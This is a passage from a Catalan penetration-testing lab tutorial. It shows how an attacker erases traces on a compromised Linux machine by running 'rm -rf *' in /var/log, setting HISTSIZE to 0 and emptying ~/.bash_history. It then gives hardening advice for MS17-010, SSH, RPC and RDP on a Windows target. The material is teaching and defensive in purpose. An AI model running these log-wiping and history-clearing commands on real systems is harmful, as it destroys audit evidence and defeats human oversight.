Els logs que queden després, una vegada executada la comanda, són els logs que indiquen que s'ha realitzat una eliminació dels logs. Podrien arribar a veure aquesta informació i deduir que algú ho ha esborrat, però encara que descobrissin això, a simple vista no sabrien com hem entrat o aconseguit accés a la màquina.


### 5.2. Esborrar els fitxers de logs manualment (Linux)

Una altra manera d'esborrar els logs, és iniciant una sessió a la màquina que estem atacant, buscar la carpeta del sistema que conté els logs i esborrar el contingut del directori, o si tenim temps, buscar les entrades que pertanyen als nostres atacs i esborrar-les. En el cas dels sistemes linux, necessitarem tenir un usuari "sudoer" o la contrasenya de l'usuari "root" per poder esborrar aquests fitxers. Els logs del sistema s'emmagatzemen al directori "/var/log":

```
root@kali:/var/log# ls -l
total 5836
-rw-r--r-- 1 root     root       72111 Apr 30 14:30 alternatives.log
drwxr-x--- 2 root     adm         4096 Jan 27 12:47 apache2
drwxr-xr-x 2 root     root        4096 Apr 30 14:29 apt
-rw-r----- 1 root     adm       133893 May  9 11:23 auth.log
-rw------- 1 root     root       74810 May  9 10:49 boot.log
-rw-rw---- 1 root     utmp        2304 May  1 12:09 btmp
-rw-r----- 1 root     adm       996827 May  9 11:11 daemon.log
-rw-r----- 1 root     adm        82628 May  9 10:50 debug
-rw-r--r-- 1 root     root     1054272 Apr 30 14:32 dpkg.log
-rw-r--r-- 1 root     root       32032 Apr 30 14:30 faillog
-rw-r--r-- 1 root     root        7385 Apr 30 14:32 fontconfig.log
drwx------ 3 inetsim  inetsim     4096 Jan 27 12:47 inetsim
drwxr-xr-x 3 root     root        4096 Jan 27 12:52 installer
-rw-r----- 1 root     adm       710013 May  9 10:49 kern.log
-rw-rw-r-- 1 root     utmp      292292 Apr 30 14:30 lastlog
drwx--x--x 2 root     root        4096 May  9 10:49 lightdm
-rw-r--r-- 1 root     root        1692 May  9 10:49 macchanger.log
-rw-r----- 1 root     adm       699504 May  9 10:50 messages
drwxr-s--- 2 mysql    adm         4096 Jan 27 12:47 mysql
drwxr-xr-x 2 root     adm         4096 Jan 27 12:45 nginx
drwxr-xr-x 2 ntp      ntp         4096 Nov 13 20:08 ntpstats
drwxr-xr-x 2 root     root        4096 May  1 06:25 openvas
drwxr-xr-x 2 root     root        4096 Feb 20  2019 openvpn
drwxrwxr-t 2 root     postgres    4096 Jan 27 12:47 postgresql
drwx------ 2 root     root        4096 Jan 27 12:52 private
drwxr-s--- 2 redis    adm         4096 Apr 30 14:30 redis
drwxr-xr-x 3 root     root        4096 Jan 27 12:44 runit
drwxr-x--- 2 root     adm         4096 Dec 16 03:47 samba
drwxr-xr-x 2 stunnel4 stunnel4    4096 Jan 27 12:47 stunnel4
-rw-r----- 1 root     adm      1788506 May  9 11:17 syslog
drwxr-xr-x 2 root     root        4096 Dec 23 14:11 sysstat
-rw-r----- 1 root     adm        39359 May  9 10:50 user.log
-rw-rw-r-- 1 root     utmp       41856 May  9 10:50 wtmp
-rw-r--r-- 1 root     root       23202 May  9 10:49 Xorg.0.log
-rw-r--r-- 1 root     root       24946 May  8 11:11 Xorg.0.log.old
-rw-r--r-- 1 root     root       24345 May  1 12:21 Xorg.1.log
-rw-r--r-- 1 root     root       24345 May  1 12:09 Xorg.1.log.old
root@kali:/var/log# rm -rf *
root@kali:/var/log# ls -l
total 0
```

En els sistemes Linux, també hem de tenir en compte que hi ha un registre de les comandes que s'executen, i amb elles podrien arribar a saber que és el que hem fet al sistema. Per visualitzar l'historial de les comandes realitzades ho podem fer al fitxer "~/.bash_history":

```
kali@kali:~$ more ~/.bash_history

mesfconsole
msfconsole
ifconfig
if config
sudo apt install net-tools
ifconfig
ip a
sudo -
sudo -i
msfdb init
sudo msfdb init
help
msfconsole
pwd
cd ..
ls 
ls 
git status
ls
ls 
poweroff
shutdown
man nmap
ip a
msfconsole
db_init
msfdbinit
msfdb init
sudo msfdb init
ls
ls
msfconsole
sudo -i
ls
vim 1_descobrir:dispositius.md
vim 1_descobrir_dispositius.md
hosts
msfconsole
sudo -i
ip a
--More--(26%)
```

La mida del nostre historial està determinada per la variable "HISTSIZE". Podem veure-la amb l'ordre "echo $HISTSIZE":

```
kali@kali:~$ echo $HISTSIZE
1000
```

Si volem que el sistema no guardi cap de les comandes que farem a continuació, podem canviar el valor d'aquesta variable amb l'ordre "export" a 0:

```
kali@kali:~$ export HISTSIZE=0
kali@kali:~$ echo $HISTSIZE
0
```
Això evitarà que les comandes que utilitzem a partir d'aquest moment es guardin. Però en el cas que prèviament s'hagi executat alguna comanda per atacar la màquina abans de canviar el valor de la variable, s'haurà guardat al fitxer "~/.bash_history". Podem eliminar o sobreescriure el fitxer per tal d'eliminar les ordres que hem executat prèviament:

```
kali@kali:~$ echo "" > ~/.bash_history
kali@kali:~$ cat ~/.bash_history 

```

Ara el fitxer està buit, i com que hem canviat el valor de la variable "HISTSIZE", aquestes últimes comandes que hem executat per esborrar el fitxer o les que executem posteriorment per seguir investigant sobre la màquina tampoc es guardaran.


## 6. Reforçar les vulnerabilitats descobertes

Ara que ja hem aconseguit descobrir les vulnerabilitats de la nostra màquina objectiu, les hem explotat i hem aconseguit obtenir-ne informació sobre el que conté, hem de mirar com reforçar aquestes vulnerabilitats per tal que una altra persona no les pugui utilitzar en la nostra contra.


### 6.1. Servei SMB: MS17-010 (Port 445)

Primer de tot començarem per la vulnerabilitat principal que hem utilitzat per accedir i crear una sessió a la màquina, la MS17-010, la qual pertany al servei SMB (port 445). Si busquem aquesta vulnerabilitat per Internet, veurem que la solució que ens donen és actualitzar les definicions de seguretat del sistema. En molts dels casos, igual que en aquest, és possible que els problemes de vulnerabilitats es puguin solucionar simplement actualitzant el sistema o l'aplicació. De totes maneres, és recomanat mantenir tant el sistema com les aplicacions actualitzades, ja que d'aquesta manera sempre tindran les definicions de seguretat al dia, i per tant probablement les vulnerabilitats més conegudes del sistema ja estiguin solucionades i no existeixin a l'última versió. Més concretament, l'actualització que soluciona el nostre problema és la següent: [Microsoft Knowledge Base article 4012212](https://support.microsoft.com/en-us/help/4012212/march-2007-security-only-quality-update-for-windows-7-sp1-and-windows).


### 6.2. Servei SSH (Port 22)

Per veure si podem tenir alguna altra vulnerabilitat, primer revisem la llista de serveis que vam treure de l'escaneig realitzat al punt [1.Descobrir dispositius](./1_descobrir_dispositius.md):

```
msf5 > services 192.168.0.21
Services
========

host          port   proto  name          state  info
----          ----   -----  ----          -----  ----
192.168.0.21  22     tcp    ssh           open   OpenSSH 7.1 protocol 2.0
192.168.0.21  135    tcp    msrpc         open   Microsoft Windows RPC
192.168.0.21  139    tcp    netbios-ssn   open   Microsoft Windows netbios-ssn
192.168.0.21  445    tcp    microsoft-ds  open   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
192.168.0.21  3389   tcp    tcpwrapped    open   
192.168.0.21  49152  tcp    msrpc         open   Microsoft Windows RPC
192.168.0.21  49153  tcp    msrpc         open   Microsoft Windows RPC
192.168.0.21  49154  tcp    msrpc         open   Microsoft Windows RPC
192.168.0.21  49155  tcp    msrpc         open   Microsoft Windows RPC
192.168.0.21  49156  tcp    msrpc         open   Microsoft Windows RPC
192.168.0.21  49157  tcp    msrpc         open   Microsoft Windows RPC
```

Com podem veure a la llista, un dels ports que tenim oberts és el 22, que pertany al ssh. Aquest port només l'hauríem de tenir obert quan l'estem utilitzant, ja que si no mentre està obert, es podria aprofitar per realitzar proves de login amb un atac de diccionari, o correm el risc que intentin executar altres exploits en contra aquest port. En el cas que sigui necessari mantenir el port obert, podríem revisar les opcions de configuració i per exemple, canviar el port perquè no sigui l'habitual, negar l'accés a root, establir un límit baix d'intents d'inici de sessió o un temps baix per iniciar sessió. També podem establir un màxim de sessions simultànies si sabem que només hem d'entrar nosaltres o certes persones. Una altra manera també seria canviar la configuració del firewall per tal que només algunes adreces ip específiques, o un rang d'adreces, puguin accedir a aquest servei en aquesta màquina. També podríem configurar el ssh per tal que l'autenticació sigui mitjançant kerberos o claus privades.


### 6.3. Servei RPC (Ports 135, 49152, 49153, 49154, 49155, 49156 i 49157)

RPC (Remote Procedure Call) és un servei que permet enviar ordres a altres ordinadors remotament, de manera que aquestes ordres s'executen a la màquina destí com si fossin ordres escrites des del mateix ordinador. Estableixen una comunicació de tipus client - servidor, de manera que el que executa les comandes és el client, i el que les rep de manera remota i les executa a la mateixa màquina és el servidor.

En el cas de la nostra màquina, en ser Windows, Microsoft recomana no desactivar aquest servei, ja que hi ha diverses funcions que depenent d'ell. Alguns exemples de les coses que podrien passar si el deshabilitem és no poder consultar els logs del sistema, no poder visualitzar les eines del sistema a la consola d'administració o que tinguem problemes amb les connexions de xarxa, entre altres coses.


Per tant, el que podem fer per evitar connexions no desitjades a través d'aquests ports, és configurar el firewall, de manera que l'accés només estigui permès a través de la pròpia ip o a través de les adreces ip que necessitem que accedeixin a aquest port.


### 6.4. Servei RDP (Port 3389)

RDP (Remote Desktop Protocol) és un protocol desenvolupat per Microsoft, el qual permet connectar-se a un altre ordinador mitjançant una interfície gràfica. Aquest servei es basa en les connexions tipus client - servidor. Aquest port no ens ocasionarà cap problema si el desactivem, per tant, si no l'hem d'utilitzar millor tenir-lo tancat. En el cas que el necessitem tenir activat, podem definir una regla al firewall per tal que només les adreces ip indicades tinguin accés a aquest port.
